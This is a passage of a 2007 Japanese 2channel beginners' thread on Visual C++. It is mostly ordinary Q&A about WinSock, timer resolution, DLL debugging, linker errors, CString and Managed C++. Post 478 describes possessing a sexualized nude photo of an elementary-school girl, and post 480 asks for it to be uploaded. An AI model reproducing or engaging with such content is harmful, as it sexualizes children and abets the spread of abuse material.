WinSockでhttpsを扱えますか?

390 :デフォルトの名無しさん:2007/02/10(土) 18:07:09
扱えるかどうかと言えば扱える
ソケットとプロトコルは関係ない
要はアプリケーションがWinSockを使ってSSL通信できるように作ればいい

391 :デフォルトの名無しさん:2007/02/10(土) 18:49:44
>>390
ありがとうございます少し調べてみます

392 :デフォルトの名無しさん:2007/02/11(日) 01:39:25
【初心者歓迎】C/C++室 Ver.34【環境依存OK】
で聞いたらスレ違いという事でここでオナガイシマス
VC6ですCtrl + Fで検索ダイアログを開いた時過去に検索した文字が出せますが
便利ですが間違えた検索単語を間違えたときの文字も残っています
一度まっさらにするにはどうしたら良いですか?

393 :デフォルトの名無しさん:2007/02/11(日) 06:19:07
パソコン初心者だろうか?

394 :デフォルトの名無しさん:2007/02/11(日) 09:42:36
WinFormsのTextBoxで、
テキストの行がコントロールからはみ出たら最終行がきちんと見えるように
オートスクロールさせたいのですが
デザイナ内にもそれらしき設定はなさそうですし、
マニュアルでプロパティを調べてもそれっぽいものが見当たりません。
どうしたらいいでしょうか?

AutoScrollOffsetってのがそうですか?
なんかPointでスクロール先を指定するみたいですが、
もしこれがそうなら使い方が良く分からないので教えてください。

395 :394:2007/02/11(日) 10:10:49
とりあえず格好悪いですが
textBox->SelectAll();
textBox->ScrollToCaret();
でできました。

396 :デフォルトの名無しさん:2007/02/11(日) 12:27:54
ヒント
・オートスクロールが有効になっている場合、自動的にキャレットのある位置が表示されるようにスクロールされる
・TextBox::SelectionStartが現在のキャレットの位置

397 :デフォルトの名無しさん:2007/02/11(日) 14:46:27
392ですがどうしたら消せる?


398 :デフォルトの名無しさん:2007/02/11(日) 15:02:24
レジストリ辺りにでも保存されてるんじゃねーかな。
もしくは再インストール。

399 :デフォルトの名無しさん:2007/02/11(日) 23:32:04
Lap[Count - 1] + Step >
(Lap[Count] = GetTickCount())
);/* case 2: の timeGetTime の部分*/
Stepが0以外だとStepに関わらず、このループを抜けるのに15ms以上もかかってしまいます。(Lap配列の数値を見て)
最初のtimeGetTimeの10万回ループは47msで遅いわけでもないですし、そもそもtimeGetTimeだとうまく動くのです。
どうしたらよいのでしょうか。


400 :デフォルトの名無しさん:2007/02/11(日) 23:43:08
いったいそれのどのあたりがループなんだ?

401 :399:2007/02/11(日) 23:50:06
>>400
ソースはってませんでした。

http://deaikei.biz/up/up/4549.zip.html
pass:cpp

#pragma comment(lib, "winmm.lib")を追加したら、
timeGetTime()とGetTickCount()の両方でうまく時間が出てこなくなってしまいました。

元に戻してもダメなので、ビルドする度に違うのかもしれません…

402 :デフォルトの名無しさん:2007/02/12(月) 00:07:11
まず、ビジーループ氏ね
それに、timeGetTimeのNTでの規定精度は「5ms以上」
ついでに、強制コンテキストスイッチの間隔もある。

403 :399:2007/02/12(月) 00:29:54
>>402
試しに比較したかっただけなので、ループの方は勘弁してください。
timeBeginPeriodで精度を1msに調整しても結局GetTickCountで同様の症状になってしまいます。
コンテキストスイッチの待ち時間は10msを超えるようなものでしたっけ?

404 :デフォルトの名無しさん:2007/02/12(月) 02:17:41
GetTickCountのヘルプ読んだか?
家のPCだと100ns単位で156250、約16ms程度の解像度だぞ。

405 :デフォルトの名無しさん:2007/02/12(月) 08:24:06
普通1/60秒だからそんなもんだね。

406 :399:2007/02/12(月) 19:24:33
>>404-405
ようやく理解できました。
Sleep(0)ループのようにタイマー割り込みを待つのですね…
GetSystemTimeAdjustmentで測ってみたら15.625msでした。

407 :デフォルトの名無しさん:2007/02/13(火) 12:47:54
CString型のメンバ変数strに文字列をいれていたのに
突然中身がなくなるというかデバッグ時にみると不適切なptr
となってアドレスは0を指しているようでした

関数から関数を呼び出してさらに関数をよびだしていきどんどん奥にいくと
この現象が起きたのですが
これはスタックオーバーフローというものですか?
解決策を教えてください

408 :デフォルトの名無しさん:2007/02/13(火) 12:49:09
>>407
関数一個ずつ丹念にデバッガで追っていくのが無難かな。
スタックオーバーフローにしろ領域破壊にしろ、どっかで誰かがなんかやってるだろうから。

409 :デフォルトの名無しさん:2007/02/13(火) 13:00:34
>>408
ありがとうございます!!
strncpyで領域破壊を起こしていました

すごく助かりました!!

410 :デフォルトの名無しさん:2007/02/13(火) 14:14:12
私はもともとC++Builder出身なのですが
VB6で、あるアプリを作成しています。

このアプリは、主処理のほとんどが
MS.NET Framework1.1 VC++.NET
で生成されたDLLで行われています。

このDLLをステップ実行やインスペクタでデバグしたいのです
が、親アプリがVBなので、どうやってデバグしたら良いやら
困り果ててます。

どなたかVC++のDLLのデバグ方法を伝授してください…
できれば簡単なやつで。

411 :デフォルトの名無しさん:2007/02/13(火) 14:50:21
ソースとデバッグ版DLLとpdbファイルがあればおk

412 :デフォルトの名無しさん:2007/02/13(火) 14:54:59
ソース、デバッグ版DLL、pdbファイルあります!
もちょっとだけ具体的に教えてもらえないでしょうか…

413 :デフォルトの名無しさん:2007/02/13(火) 15:32:24
それって開発環境そのまま?
途中で止めてアタッチする手もあるが、環境あるなら
DLLのデバッグ開始すると、実行時にEXE指定しろって言ってくるから
それでそのEXE指定すればいいと思う。
デバッグしたいとこはブレークポイント設定しておけばいいし。

414 :デフォルトの名無しさん:2007/02/13(火) 15:35:06
もしVB側もデバッグしてるのなら、関数呼び出し時にステップインで
DLLとPDBが同じとこにあればソースの場所聞いてくると思うので
そこでソース選べば追えると思うけど、、、

VB呼び出しはもしかしたら違うかもしれん、、、
C/C++からの呼び出ししかやったことないんで。
もしだめなら試すから言ってくれ

415 :デフォルトの名無しさん:2007/02/13(火) 18:25:23
>>413-414
丁寧なご回答ありがとうございます。
でもまだちょっと分かってないです…

DLLですが、メイク時に実行すると
「ActiveXコントロールテストコンテナ」というのが
出ます。
これかのことか!?と思ったのですが、EXE指定はできないっぽいです。

>>414さんの方法は今がんがってる最中です…

416 :デフォルトの名無しさん:2007/02/13(火) 20:56:40
質問です。
学校で使っている描画のプログラム(?)をVC++6.0で使いたいと思い、
ヘッダーファイルとライブラリファイルを
Microsoft Visual Studio\VC98 のIncludeフォルダとLibフォルダにそれぞれ入れ、
プログラムをコンパイルしたのですが、

warning LNK4003: ライブラリの形式が無効です; ライブラリは無視されます

とエラーになってしまいます。
これと同様のことをBCC5.5でしても問題ありませんでした。
何か間違っているところがあれば是非教えてください。

417 :デフォルトの名無しさん:2007/02/13(火) 21:01:20
ライブラリがBCC用なんだろ。

418 :418:2007/02/13(火) 21:40:29
>>417
Win32 Static Libraryでプロジェクトを作りそこにライブラリソースを追加しビルドしました。
そしてできたライブラリファイルで再び試してみると、

ライブラリの形式が無効です  このエラーはでなくなりましたが、
LNK2001 :外部シンボル"関数名"は未解決です  このエラーは消えませんでした。

ライブラリファイルの作り方もよくわからなかったのですが合っているでしょうか?


419 :デフォルトの名無しさん:2007/02/13(火) 21:41:53
"関数名"が、そのライブラリに入っているべきものなら、
どっか、あってないんだろ。

420 :デフォルトの名無しさん:2007/02/13(火) 22:36:39
.NETでダイアログベースで作ってます。
CRectとGetWindowRectを使用して自身の座標を得ることはできたのですが
自身と関係ないWindowの座標を得る場合にはどうしたらいいんでしょうか?


421 :デフォルトの名無しさん:2007/02/14(水) 00:22:20
GetWindowRectだな。

必要とするウィンドウのハンドルを取得するべし。。
.NET Frameworks だけじゃ無理な気がしたので、WinAPI を使いましょう。

422 :デフォルトの名無しさん:2007/02/14(水) 12:19:22
エディットコントロールにintの中身を表示させるにはどうしたらいいんですか?
文字列は"”でできました。
変数だけ書いたらエラーでました。

423 :デフォルトの名無しさん:2007/02/14(水) 12:33:45
釣れますか?

424 :デフォルトの名無しさん:2007/02/14(水) 14:47:48
編集制御->文字列 = 文字列にな〜れ(数値);

425 :デフォルトの名無しさん:2007/02/14(水) 16:27:57
>>420
なぜ.NETでCRectとGetWindowRectが出てくる?

426 :デフォルトの名無しさん:2007/02/14(水) 17:05:59
VC6.0でベースがDIALOGか、SDIで出力結果をDOS窓に出す方法はあるんですか。
はじめからDOS窓アプリにしないとだめですか?


427 :デフォルトの名無しさん:2007/02/14(水) 17:13:21
AllocConsole?

428 :デフォルトの名無しさん:2007/02/14(水) 17:18:42
VC++プログラマーちょっとこい!!
http://ex17.2ch.net/test/read.cgi/news4vip/1171440924/

429 :デフォルトの名無しさん:2007/02/14(水) 17:31:05
CTypedPtrList<CObList, VALUE*>のSeqValueListを
CTypedPtrList<CObArray, VALUE*>にする時ってどうすればいいんでしょうか?
下のがソースなんですが、やり方が良くわからない。。。orz
CItemInfo::~CItemInfo(){
int iCount;
POSITION pos;
VALUE *pValue;
m_pValueList = &m_SeqValueList;
iCount = (int)m_pValueList->GetCount( );
pos = m_pValueList->GetHeadPosition( );
for( int i=0; i<iCount; i++ ){
pValue = m_pValueList->GetNext( pos );
delete pValue;
}
m_pValueList->RemoveAll();
m_pValueList = &m_ParValueList;
iCount = (int)m_pValueList->GetCount( );
pos = m_pValueList->GetHeadPosition( );
for( int i=0; i<iCount; i++ ){
pValue = m_pValueList->GetNext( pos );
delete pValue;
}
m_pValueList->RemoveAll();
}

430 :426 :2007/02/14(水) 17:36:11
AllocConsole();
freopen("con", "w", stdout);
printf("hello console\r\n");
//FreeConsole();
でできました。すみません。

431 :デフォルトの名無しさん:2007/02/14(水) 17:54:01
エディタの背景を黒にカスタマイズしたいのですが、どこにもそんな項目がありません
ちなみにヴァージョン6.0です

432 :デフォルトの名無しさん:2007/02/14(水) 18:57:23
エディター?IDEのかな?
ツールのオプションの書式の背景でない?

433 :420:2007/02/14(水) 21:14:12
void CMyDlg::OnMouseMove(UINT nFlags, CPoint point)
ってところでpointに入っててrectはサイズを知りたくて使ってただけでした、すみません。

クライアント座標はpointに入ってたのですがスクリーン座標を知るにはどうしたらいいんでしょうか?
SetCapture()でクライアント領域外の座標は得れたんですがクライアントが中心になってしまっています。
よろしくお願いします。

434 :デフォルトの名無しさん:2007/02/14(水) 21:20:59
ClientToScreen

435 :420:2007/02/14(水) 22:51:21
>>434
できました、

436 :420:2007/02/14(水) 22:56:32
できました、ありがとうございます!

437 :デフォルトの名無しさん:2007/02/14(水) 23:09:02
>>433
それどうみても.NETでない。

438 :デフォルトの名無しさん:2007/02/14(水) 23:33:46
俺たちはとんでもない勘違いをしていたようだ
.NETとは、Visual Studio .Net 2003の省略形だったんだよ!

439 :デフォルトの名無しさん:2007/02/15(木) 00:04:24
2002 のことも忘れないで上げてください。

440 :420:2007/02/15(木) 00:06:40
まさしくVisualStudio.Net2003の事です。

.NETとは違ったんでしょうか・・・すみません;

441 :デフォルトの名無しさん:2007/02/15(木) 00:09:27
な……なんだってー!!
……職場にもいるけどな、そういうヒト。
さらにVisual Studio 2005のことも「ドットネット」って呼んでくれるから、
毎回頭の中で翻訳するのが大変。
例「C++でデバッグしていてドットネットが落ちるんだよな〜」「???」

442 :デフォルトの名無しさん:2007/02/15(木) 00:41:29
>>440
.NETと言ったら普通.NET Frameworkのことを指す。

新規プロジェクトの中に.NETとか書かれたテンプレートがあるだろ。
それが.NET Frameworkを使うプロジェクトを作るのに使うテンプレート。

.NET Frameworkには大量のクラスライブラリが含まれているし、
Visual Studioではフォームエディタも使え、作るほうとしては充実しているが、
利用者に.NET Frameworkをインストールしてもらわないといけないのが、
一般的なアプリケーション開発ではネック。
XP SP2あたりから漏れなくインストールされるようになってきているけどね。

443 :デフォルトの名無しさん:2007/02/15(木) 10:44:29
Vistaで、インストールされているWindowsコンポーネントを確認すると
.NET Frameworkっていうのがあった。

言い方が良くわからないけど、つまり.NETというのは単なる1つのAPI
ってことで、開発環境を指しているのではない、ということ?

444 :デフォルトの名無しさん:2007/02/15(木) 10:57:02
>>443
.NETの環境向けに開発できるのが、VS .NET

445 :デフォルトの名無しさん:2007/02/15(木) 11:04:02
初心者の場合は自分勝手な略語を使わないできちんと書けばいい
ハードディスクのことをハードと呼ぶやつとか
本人はどういうつもりか知らんけど馬鹿にしか見えない。

446 :デフォルトの名無しさん:2007/02/15(木) 11:05:21
なるほど…。
Visual Studio .NETというのは、.NET Frameworkがインストールされている
端末向けの開発環境、ということか。

Windows Vistaには標準で.NET Frameworkがインストールされているけど、
XPはSP2を入れないと.NET Frameworkが入っていないから、
そういう端末を対象とするなら.NET Frameworkが入っているかいないかを
確認しなければならないということか。

447 :デフォルトの名無しさん:2007/02/15(木) 11:10:29
Visual Studio .NETという名前だと .net専用と間違える人が多すぎるから
Visual Studio .NETという名前は使われなくなった。

448 :デフォルトの名無しさん:2007/02/15(木) 11:15:08
あ、俺も以前、ずっと勘違いしてたw
.NETというくらいだからネットワーク=インターネット専用なんだろうな、俺には
関係ないなと…w



449 :デフォルトの名無しさん:2007/02/15(木) 14:39:24
逆にVisual Basicは2005でも.NETを付けておけば良かったのにと思う。
「Visual Basic .NET」 2005という具合にさ。

450 :デフォルトの名無しさん:2007/02/15(木) 22:37:51
Visual Stadio2005 をインストールして
VS2005 C++で
#include <stdio.h>
main()
{
int a;
}
をコンパイルすると
error C4430: 型指定子がありません - int と仮定しました
が出ます
今まではいけてたんですが、わかる方お願いします。


451 :デフォルトの名無しさん:2007/02/15(木) 22:55:09
int main(){
}

452 :デフォルトの名無しさん:2007/02/16(金) 01:11:53
関数の戻り値の型を省略できるのはCだけ。

たぶん拡張子をcにしたり、コンパイルオプションから/TPを外したりすれば、
(int抜きの)main()でも行けると思う。

453 :デフォルトの名無しさん:2007/02/16(金) 03:40:09
stringをintにするにはどうすれば?

454 :デフォルトの名無しさん:2007/02/16(金) 03:47:10
>>453
cli::String なのか std::string なのかはっきりしろ。

455 :デフォルトの名無しさん:2007/02/16(金) 03:55:21
std::string

456 :デフォルトの名無しさん:2007/02/16(金) 04:03:33
>>455
std::string s("123");
int i = atoi(s.c_str());

457 :デフォルトの名無しさん:2007/02/16(金) 04:07:03
>>456
それができないんですよ
エラーがでます

458 :デフォルトの名無しさん:2007/02/16(金) 04:08:59
エラーが出ますじゃないでしょ。
どんなエラーが出るのか言いなさいよ。

459 :デフォルトの名無しさん:2007/02/16(金) 04:09:06
>>457
どんなエラーか書け

460 :デフォルトの名無しさん:2007/02/16(金) 04:16:54
>>457
そんなんだから成長しないんですよ。

461 :デフォルトの名無しさん:2007/02/16(金) 04:18:10
>>457
とっとと書けよ。あんぽんたん。

462 :デフォルトの名無しさん:2007/02/16(金) 04:19:58
同じ奴みたいだな。夜釣りの常習犯か。
http://pc10.2ch.net/test/read.cgi/tech/1169039760/877



463 :デフォルトの名無しさん:2007/02/16(金) 12:45:22
設計でUMLを使ってる人いますか?
マルチスレッドとかUMLで設計できますか?

464 :デフォルトの名無しさん:2007/02/16(金) 13:17:43
UMLは詳しく知らん身だけど
アクティビティ図使えば表現できるんじゃねーかとは思う

が、とりあえずスレ違いだ。

465 :デフォルトの名無しさん :2007/02/17(土) 01:16:40
VC++でゲームを作ろうと考えてるんですが、オススメの入門書等ありませんか?
何件か書店回ってパラパラと立ち読みしてみたんですがどういうのが良いのか分からなくて困ってます。
やはり実用例があるC++でゲームを作るみたいな本が良いんでしょうか。
既出、スレ違いだったらすみませんorz

466 :デフォルトの名無しさん:2007/02/17(土) 11:41:49
ゲ製作技術
http://pc10.2ch.net/gamedev/
板違いやな

ゲーム製作はC++だけと考えない方がいい。
どの程度の規模で何やりたいかによって、利用する言語は変わると思う。
ミニゲームであれば、HSP/Flashでも創れるし。

467 :デフォルトの名無しさん:2007/02/17(土) 12:34:10
そもそもゲームって時点で入門を超えてる

468 :デフォルトの名無しさん:2007/02/17(土) 12:41:30
初等教育 算数
教養課程 数学 物理 C/C++
専門課程 ゲーム製作

469 :デフォルトの名無しさん:2007/02/17(土) 16:22:37
今、Visual C++ の入門書を探しています。
Cの文法は一通り理解しています。
本格的にWindowsプログラミングができるようになりたいので、
これから勉強を始めるつもりです。

数年前、ある先生から、
「Winアプリケーションを作れるようになるためには、
 まずはWinAPIを理解→オブジェクト指向を理解→MFCを使ったプログラミング」
というような段階を踏んで勉強していくといい、と聞きました。
勧められた本が、山本信雄の「はじめてのプログラミング」(全3巻)で、
ほぼ上記の説明通りの構成で書かれている本らしいのですが、アマゾンで見てみたら
残念なことにこの本はVisualC++5.0/6.0向けらしいです。
現行のVC++2005は、6.0から「かなり変わった」と聞いているので、別の本を
買うしかないと思っています。

「2005になって、.NetFrameWorkのクラスを利用するプログラミングに変わって..」
と聞いても、私にはまだよくわからないのですが、前記の「API→オブジェクト指向→MFC」
という学習の進め方自体も、2005になってだいぶ変わったのでしょうか。
多少時間がかかっても構わないので、なるべく体系だった学習ができるような
入門書がいいのですが....

ちなみに最終的に作りたいものは、周辺機器のデバイスドライバのたぐいです。

もし色々な本を読んでいる方がおられましたら、よろしくお願いします。


470 :デフォルトの名無しさん:2007/02/17(土) 17:09:09
Winアプリとデバイスドライバだとあんまり関連性ないよ

471 :469:2007/02/17(土) 17:36:27
>470
すみません。「デバイスドライバ」という書き方では不十分でした。

周辺機器は、光学センサや超音波センサで空間把握をするための装置です。
通信されてきたデータをPC画面上でグラフィカルにモニターするためのWinアプリを
作りたいと思っています。そして、ドライバ周りも一緒にC++でコーディングできればと
考えています。


472 :デフォルトの名無しさん:2007/02/17(土) 18:01:43
VisualC++2005なら5.0/6.0でできてた事はできるよ。
2005で「API→オブジェクト指向→MFC」という学習の進め方もできる。
かなり変わったというよりは、かなり機能が追加された。

473 :465:2007/02/17(土) 18:34:36
>>466
少し探したのですが見つからなかったので助かりました。
そちらの方で聞いてみます。誘導ありがとうございました。

474 :デフォルトの名無しさん:2007/02/17(土) 18:36:05
expressでapiの場合は
リソースエディタやクラスウィザードとか使わないだろうし
2005の本にこだわる意味はないだろうね

475 :デフォルトの名無しさん:2007/02/17(土) 19:20:02
VCは初心者向きじゃないから嫌ならVBやC#を使えということだな

476 :デフォルトの名無しさん:2007/02/17(土) 19:43:12
>>469
COMポートで繋ぐ程度ならデバイスドライバは要らない。
独自のカード経由&そのカードが仕様書しか無い、って話なら別だけど。
で、一つ言っておくなら「オブジェクト指向とMFCは一切関係が無い」。
MFCはWinAPIを手を抜いて使うためのラッパ。
あと、VC6のソースが2005で動かない病に良く効く呪文。
プロジェクト - プロパティ - 構成プロパティ - 文字セット - マルチバイト文字セットを使用する

477 :デフォルトの名無しさん:2007/02/17(土) 21:47:28
VC++.NET2003 でWindowsフォームアプリケーションを作っています。
以前コンソールアプリケーションで作成した、Mysqlのクライアントプログラムを
利用したいと考えていますが、mysql.hを追加すると下記のエラーが出ます。
mysql.hは利用できますか?



Open.cpp
WINVER not defined. Defaulting to 0x0501 (Windows XP and Windows .NET Server)
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(188) : error C2146: 構文エラー : ';' が、識別子 'fd' の前に必要です。
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(188) : error C2501: 'st_net::SOCKET' : 識別名を宣言するのに、型が指定されていません。
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(188) : error C2501: 'st_net::fd' : 識別名を宣言するのに、型が指定されていません。
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(358) : error C2065: 'SOCKET' : 定義されていない識別子です。
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(358) : error C2146: 構文エラー : ')' が、識別子 's' の前に必要です。
c:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\include\mysql\mysql_com.h(359) : error C2059: 構文エラー : ')'


478 :デフォルトの名無しさん:2007/02/18(日) 03:29:49
C++builder5.0で、なんかの画像コンポーネントに、今手元にある
無毛でくっきり縦線・超美少女小学生のヌード写真(jpg)を貼り付
けたいのですがどうすればいいのかわかりません。

ウインドウの大きさと同期して画像のサイズも変わるようにしたい
です。誰か教えてください。

479 :デフォルトの名無しさん:2007/02/18(日) 03:45:06
>>478
まず、その素敵な性癖を直せ。
話はそれからだ。

480 :デフォルトの名無しさん:2007/02/18(日) 07:36:09
まず、その素敵な写真をうpれ。
話はそれからだ。

481 :ぶいしー:2007/02/18(日) 16:39:58
DLLのリソースIDについて質問させてください。

拡張DLL、レギュラーDLLともに、
呼び出すクライアントとのリソースIDの重複は気にするのでしょうか?
あるサイトだと、拡張DLLはリソースIDの管理はMFCがやってくれる
みたいなことがかかれていたので・・

どなたかご教授ください。


482 :デフォルトの名無しさん:2007/02/18(日) 17:41:31
>>477
#include <mysql.h>の前に、#include <winsock.h>。もれはこれで
3ヶ月ほど悩んだ。


483 :デフォルトの名無しさん:2007/02/18(日) 20:57:18
Visual Studio 2005なんですけど
SystemParametersInfo(SPI_SETDESKWALLPAPER,NULL,"c:\\a.bmp",0);
でコンパイルはいけるんですが、ソリューションのビルドで
エラーになります
"c:\a.bmp"でもだめです
Vistaでもいけますよね?
解る方お願いします


484 :デフォルトの名無しさん:2007/02/18(日) 20:59:14
>■質問するにあたって
>・エラーや警告のときはエラーメッセージを書きましょう。


485 :デフォルトの名無しさん:2007/02/18(日) 21:21:25
>>483 です
エラーが多いんで伏せてました

リンクしています...
aaa_ch.obj : error LNK2028: 未解決のトークン (0A000022) "extern "C" int __stdcall
SystemParametersInfoW
(unsigned int,unsigned int,void *,unsigned int)"
(?SystemParametersInfoW@@$$J216YGHIIPAXI@Z) が関数 "
int __cdecl main(void)" (?main@@$$HYAHXZ) で参照されました。
aaa_ch.obj : error LNK2019: 未解決の外部シンボル "extern "C"
int __stdcall SystemParametersInfoW
(unsigned int,unsigned int,void *,unsigned int)"
(?SystemParametersInfoW@@$$J216YGHIIPAXI@Z)
が関数 "int __cdecl main(void)" (?main@@$$HYAHXZ) で参照されました。
E:\C++\aaach\Debug\aaach.exe : fatal error LNK1120: 外部参照 2 が未解決です。

以上です、お願いします。


486 :デフォルトの名無しさん:2007/02/19(月) 11:11:35
超初歩的な質問なのですが、
MS Visual C++ .NET で、IntToStr関数を使えないので他の方法を調べてます。
値を文字列に変換するにはどうしたら良いのでしょうか?


487 :デフォルトの名無しさん:2007/02/19(月) 11:15:20
マネージプログラムならメソッドのToString
そうでなければ、boost::lexical_cast、std::(basic_)ostringstream、std::sprintf (_stprintf)と続く

488 :デフォルトの名無しさん:2007/02/19(月) 11:24:28
>>487
下の方法でできました!親切な回答ありがとうございます。

int a=100;
label1->Text = a.ToString();

489 :デフォルトの名無しさん:2007/02/19(月) 15:21:20
連続で申し訳ないのですが、また質問があります。

別の人が作ったソースで下のようにオーバーロードされた関数があるのですが、
この2つの違いって何なんでしょうか?

CRect hoge(CRect & r) const
{
  :
  :
}

CRect hoge(CRect const & r) const
{
  :
  :
}

490 :デフォルトの名無しさん:2007/02/19(月) 15:39:02
>>485
必要なライブラリリンクしてないんじゃね

491 :デフォルトの名無しさん:2007/02/19(月) 15:40:04
>>489
中味は同じでもかまわない
コンパイラが区別できればそれでいい

492 :デフォルトの名無しさん:2007/02/19(月) 15:42:38
>>489
constの有無。
特にconstな参照は右辺値を受け取れるので、
実質的にその多重定義は右辺値か左辺値かで振り分けられる。

493 :デフォルトの名無しさん:2007/02/19(月) 16:11:30
>>492
右辺値、左辺値とは何を指していますか?
この例だと引数は「r」1つだけなので右辺・左辺関係ないように思えます。

あと & についてですが、& をつけると、変数の値を変更すると
呼び出し元のスコープでもそれが変更される、という風に単純に考えています。

これに const が付くということに矛盾も感じます。
const とは、「この引数は変更不可です」という宣言だと思うのですが、
だとすれば、引数を & で渡す意味がないことになります。

このソース、バグ持ちでしょうか?

494 :デフォルトの名無しさん:2007/02/19(月) 16:25:50
ここはC++相談室じゃないし
くだらない質問は遠慮してほしいな

495 :デフォルトの名無しさん:2007/02/19(月) 16:34:28
>>493
お前が馬鹿なだけだからVCやるまえにC++勉強してこい

496 :デフォルトの名無しさん:2007/02/19(月) 17:03:54
>>494-495
わかりました…
ありがとうございます

497 :デフォルトの名無しさん:2007/02/19(月) 18:35:13
そもそも右辺値、左辺値はC言語の初歩

498 :デフォルトの名無しさん:2007/02/19(月) 19:53:10
>>496
あきらめるなな。最初は分かんないことばかりなんだから。

499 :デフォルトの名無しさん:2007/02/20(火) 22:01:04
すみません。
プロジェクトのプロパティで、
ランタイムライブラリについての設定周りで質問なのですが、

今/MDでビルドすると上手く行くいき、/MTにしたところ
ヒープの破壊が発生するといった状況になりました。
プロジェクトには自前のDLLを使ってます。
ttp://support.microsoft.com/kb/190799/ja
ここにあるとおり、CRTオブジェクトの操作の不備が原因であると
分かりました。

それで質問なのですが、
多くの場合の開発では/MTと/MDどちらを使用するのでしょうか、
/MDの方が、容量が小さくなるし、CRTobjも共有できるようですが、
Cランタイム等がインストールされている必要があります。
/MTだと、ランタイムがインストールされていなくても動作
するようですが、容量が大きく、CRTobjが共有できないようです。

どっちもどっちなのですが、やはり/MDが主流なのでしょうか?

500 :デフォルトの名無しさん:2007/02/20(火) 22:13:29
何の目的か知らないけど、とくに必要感じなかったらデフォのままで
あとここは初心者スレだし

501 :デフォルトの名無しさん:2007/02/20(火) 22:22:00
VC++ というよりはC++の話かも知れませんが教えてください。

CStirng s;
testFunc(&s);

void testFunc(CString s)
{ CString tmp("test"); (*s) = tmp; }

とやると s の値が呼び出し元でも変更されていて、

CString *s;
testFunc(s);

void testFunc(CString *s)
{ CString tmp("test"); s = &tmp; }

とやると変更されていないのはなぜでしょう?

Cのイメージからいくと上の方が変更されずに下で変更されるような気がするのですが・・

502 :デフォルトの名無しさん:2007/02/20(火) 22:30:08
int *p;
testFunc(p);

void testFunc (int *p)
{ int tmp=1; p=&tmp; }

503 :499:2007/02/20(火) 22:48:00
あ、スレ違いすみません。
他スレに投げてきます。


504 :501:2007/02/20(火) 22:50:22
>>502
すいません。勘違いしていました。
その通りですね。

505 :デフォルトの名無しさん:2007/02/20(火) 22:52:04
上のやつもあんまり見ない使い方だな
受けたい場合はこういう風に使うのが普通

void GetWindowText( CString& rString ) const;

506 :デフォルトの名無しさん:2007/02/20(火) 22:56:30
素直にCString返せよ。

507 :デフォルトの名無しさん:2007/02/21(水) 00:08:53
それはどうよ。
んまぁ今のCPUじゃ一瞬だろうけどな…

508 :デフォルトの名無しさん:2007/02/21(水) 01:33:29
CStringは参照カウント使ってるから、大したオーバーヘッドじゃないよ。

509 :デフォルトの名無しさん:2007/02/21(水) 06:19:25
オーバーヘッドな気もするけどMFCもこんなことやってるな

CString CListCtrl::GetItemText(int nItem, int nSubItem) const
{
ASSERT(::IsWindow(m_hWnd));
LVITEM lvi;
memset(&lvi, 0, sizeof(LVITEM));
lvi.iSubItem = nSubItem;
CString str;
int nLen = 128;
int nRes;
do
{
nLen *= 2;
lvi.cchTextMax = nLen;
lvi.pszText = str.GetBufferSetLength(nLen);
nRes = (int)::SendMessage(m_hWnd, LVM_GETITEMTEXT, (WPARAM)nItem,
(LPARAM)&lvi);
} while (nRes == nLen-1);
str.ReleaseBuffer();
return str;
}

510 :デフォルトの名無しさん:2007/02/21(水) 09:41:27
CStringのコピーは、ポインタコピー + αくらいのオーバーヘッドでしょ。

511 :デフォルトの名無しさん:2007/02/21(水) 16:45:09
失礼します。
MS Visual C++ .NET にて質問なのですが、テキストボックスのフォントを

textBox1->Font = new System::Drawing::Font("MSゴシック", 10);

このように変更できますが、new しっぱなしで構わないのでしょうか?
また、

textBox1->Font->Name = "MSゴシック";
textBox1->Font->Size = 10;

このように変更できないのでしょうか?
よろしくおねがいします。

512 :デフォルトの名無しさん:2007/02/21(水) 16:48:36
>>511
1) コントロールに割り当てると、うまく壊すタイミングがないからGCに任せるといい。
2) 読み取り専用プロパティだから無理。

513 :511:2007/02/21(水) 18:33:41
>>512
ありがとうございます。
でも分からないことだらけで死にそうです…。
ビルダーだったら簡単なのに…。とりあえず以下のように拡張しました。

  // フォント情報生成
  CString  fontName = dlg.GetFaceName();
  int    fontSize = dlg.GetSize()/10;
  COLORREF  fontColor = dlg.GetColor();

  // BOLD と ITALIC
  int fontStyle = 0;
  if(dlg.IsBold() ) fontStyle += (int)FontStyle::Bold;
  if(dlg.IsItalic()) fontStyle += (int)FontStyle::Italic;

  // セット
  textBox1->Font = new System::Drawing::Font(fontName, fontSize, (FontStyle)fontStyle);

なお new を gcnew にすると
error C2065: 'gcnew' : 定義されていない識別子です。
とエラーが出ます。
これは何故なのでしょうか?

514 :デフォルトの名無しさん:2007/02/21(水) 19:33:37
言語が違うからだろう。

Visual Studio .NET 2002 / 2003
-> Managed C++

Visual Studio 2005
-> C++/CLI

おそらく2003あたりなんだろうけど、
開発環境は "MS Visual C++ .NET" なんて略さず、確り書くべき。

515 :デフォルトの名無しさん:2007/02/21(水) 19:46:08
マネージドC++ではマネージクラスをnewすると漏れなくGCの管理下に置かれる。

それはともかくこのほうがいいと思う。
FontStyle fontStyle;
if (dlg.IsBold()) fontStyle |= FontStyle::Bold;
if (dlg.IsItalic()) fontStyle |= FontStyle::Italic;

516 :デフォルトの名無しさん:2007/02/21(水) 22:37:04
.NET 2003でWinsockを使いたい場合どうすればいいのでしょうか?

プロジェクトを作る場合にチェックボックスで指定出来るのは後から
知ったのですが、これを忘れた場合どうすればよいのでしょうか?
ws2_32.lib のリンクなどが必要だと思うのですが、VC++6.0とは
リンクの仕方が変わっているようで分かりませんでした。

517 :デフォルトの名無しさん:2007/02/21(水) 22:50:37
プロジェクトを作る場合にチェックボックスで指定した場合
プロジェクトを作る場合にチェックボックスで指定しなかった場合
2種類つくってどこが違うか比較

518 :デフォルトの名無しさん:2007/02/21(水) 22:58:45
/LIBPATH

をmsdnで調べましょう

519 :デフォルトの名無しさん:2007/02/21(水) 23:12:26
>>482
有難うございます、解決できました。

520 :デフォルトの名無しさん:2007/02/22(木) 10:56:24
>>514-515
ありがとうございます。
おかげさまで疑問点は解決できました。

521 :デフォルトの名無しさん:2007/02/22(木) 11:05:08
どうでもいい質問かもしれないのですが、
